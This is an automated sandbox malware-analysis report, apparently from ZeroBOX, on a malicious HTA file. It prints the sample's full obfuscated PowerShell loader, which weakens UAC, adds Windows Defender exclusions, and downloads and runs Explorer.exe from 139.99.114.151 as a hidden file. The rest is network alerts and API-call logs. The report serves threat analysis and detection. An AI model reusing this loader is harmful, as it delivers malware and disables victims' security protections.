Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 13, 2024, 7:16 p.m.	Jan. 13, 2024, 7:39 p.m.

Size	14.8KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`6be3e8b51f47ae0b17f18c2978170c07`
SHA256	`ff1655bfc07b1d408aaf18728d64b3d1a57488e2219cc1848f1d33e80716d19b`
CRC32	`7A5B0B91`
ssdeep	`384:r42j7XBXB8VpxV0fnflQnErFw1grdvtzibLQ:r4k`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\hhh.hta
508
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::WriteAllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoYHt){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410))) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $iDogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilOnp($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,73402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNaRfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkOoGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUFCq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUFCq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobLXAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn};function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add-MpPreference -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -ExclusionExtension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -Path $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDtoWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351,73353,73359,73348,73359,73359,73348,73351,73351,73354,73348,73351,73355,73351,73349,73404,73407,73410,73403,73349,73371,73422,73414,73410,73413,73416,73403,73416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH;YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ;" uac
  2072

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
139.99.114.151	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 139.99.114.151:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 139.99.114.151:80	2016700	ET HUNTING Suspicious explorer.exe in URI	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 13, 2024, 7:16 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 13, 2024, 7:16 p.m.			0	0

Command line console output was observed (50 out of 309 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: At line:1 char:1671 console_handle: 0x00000047	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: + function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::Write console_handle: 0x00000053	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: AllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoY console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: Ht){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410) console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: )) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith(( console_handle: 0x00000077	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -Exec console_handle: 0x00000083	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: utionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWit console_handle: 0x0000008f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: h((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $i console_handle: 0x0000009b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: DogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilO console_handle: 0x000000a7	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: np($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,7 console_handle: 0x000000b3	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: 3402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNa console_handle: 0x000000bf	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: RfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkO console_handle: 0x000000cb	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: oGu).value__};function UbnAGDtoWmGRHMWp($sIOnmedZDDmzbaqMY){$piDBrOWjfSpEFsTcUF console_handle: 0x000000d7	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: Cq = New-Object (rUZdUobLXAfzKyLERv @(73380,73403,73418,73348,73389,73403,73400 console_handle: 0x000000e3	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: ,73369,73410,73407,73403,73412,73418));[Net.ServicePointManager]::SecurityProto console_handle: 0x000000ef	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: col = [Net.SecurityProtocolType]::TLS12;$PCfkdoRHTEkbDRym = $piDBrOWjfSpEFsTcUF console_handle: 0x000000fb	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: Cq.DownloadData($sIOnmedZDDmzbaqMY);return $PCfkdoRHTEkbDRym};function rUZdUobL console_handle: 0x00000107	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: XAfzKyLERv($dJpyOwCQuNvvus){$SdToBurDGMn=73302;$VxLTWGUn=$Null;foreach($VugtEnu console_handle: 0x00000113	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: in $dJpyOwCQuNvvus){$VxLTWGUn+=[char]($VugtEnu-$SdToBurDGMn)};return $VxLTWGUn console_handle: 0x0000011f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: };function LFpSWuJMZqJ(){$gDIyZDdKs = $env:Temp + '\';Set-ItemProperty -Path RE console_handle: 0x0000012b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: GISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\S console_handle: 0x00000137	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: ystem -Name ConsentPromptBehaviorAdmin -Value 0;$DqPtwnqSlxilGJt=$env:Temp; Add console_handle: 0x00000143	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: -MpPreference <<<< -ExclusionPath $DqPtwnqSlxilGJt;Add-MpPreference -Exclusion console_handle: 0x0000014f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: Extension ?lnk?;$bWhkJyOqWMVrLJ = $gDIyZDdKs + 'Explorer.exe'; if (Test-Path -P console_handle: 0x0000015b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: ath $bWhkJyOqWMVrLJ){YCRqlDfp $bWhkJyOqWMVrLJ;}Else{ $hEDDEUJiAbfkEXH = UbnAGDt console_handle: 0x00000167	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: oWmGRHMWp (rUZdUobLXAfzKyLERv @(73406,73418,73418,73414,73360,73349,73349,73351 console_handle: 0x00000173	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: 3416,73348,73403,73422,73403));vVvjPjftuBpios $bWhkJyOqWMVrLJ $hEDDEUJiAbfkEXH; console_handle: 0x00000197	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: YCRqlDfp $bWhkJyOqWMVrLJ;};yrxXGaHYxljOAHilOnp $bWhkJyOqWMVrLJ;;;;;}LFpSWuJMZqJ console_handle: 0x000001a3	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: ; uac console_handle: 0x000001af	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x000001bb	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: mmandNotFoundException console_handle: 0x000001c7	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000001d3	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x000001f3	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x000001ff	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000020b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: At line:1 char:1720 console_handle: 0x00000217	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: + function vVvjPjftuBpios($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym){[IO.File]::Write console_handle: 0x00000223	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: AllBytes($iDogYbJVrauoYHt, $PCfkdoRHTEkbDRym)};function YCRqlDfp($iDogYbJVrauoY console_handle: 0x0000022f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: Ht){if($iDogYbJVrauoYHt.EndsWith((rUZdUobLXAfzKyLERv @(73348,73402,73410,73410) console_handle: 0x0000023b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: )) -eq $True){rundll32.exe $iDogYbJVrauoYHt }elseif($iDogYbJVrauoYHt.EndsWith(( console_handle: 0x00000247	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: rUZdUobLXAfzKyLERv @(73348,73414,73417,73351))) -eq $True){powershell.exe -Exec console_handle: 0x00000253	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: utionPolicy unrestricted -File $iDogYbJVrauoYHt}elseif($iDogYbJVrauoYHt.EndsWit console_handle: 0x0000025f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: h((rUZdUobLXAfzKyLERv @(73348,73411,73417,73407))) -eq $True){misexec /qn /i $i console_handle: 0x0000026b	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: DogYbJVrauoYHt}else{Start-Process $iDogYbJVrauoYHt}};function yrxXGaHYxljOAHilO console_handle: 0x00000277	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: np($vVvjPjftuBpios){$dQtvvTIRLvmkOoGu=(rUZdUobLXAfzKyLERv @(73374,73407,73402,7 console_handle: 0x00000283	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: 3402,73403,73412));$tMkldNaRfWU=(Get-ChildItem $vVvjPjftuBpios -Force);$tMkldNa console_handle: 0x0000028f	1	1
WriteConsoleW Jan. 13, 2024, 7:16 p.m.	buffer: RfWU.Attributes=$tMkldNaRfWU.Attributes -bor ([IO.FileAttributes]$dQtvvTIRLvmkO console_handle: 0x0000029b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0918 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 13, 2024, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f0e18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 13, 2024, 7:16 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://139.99.114.151/file/Explorer.exe

Performs some HTTP requests (1 event)

request

GET http://139.99.114.151/file/Explorer.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 167 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x715c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x715c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02521000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 13, 2024, 7:16 p.m.	process_identifier: 2072 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
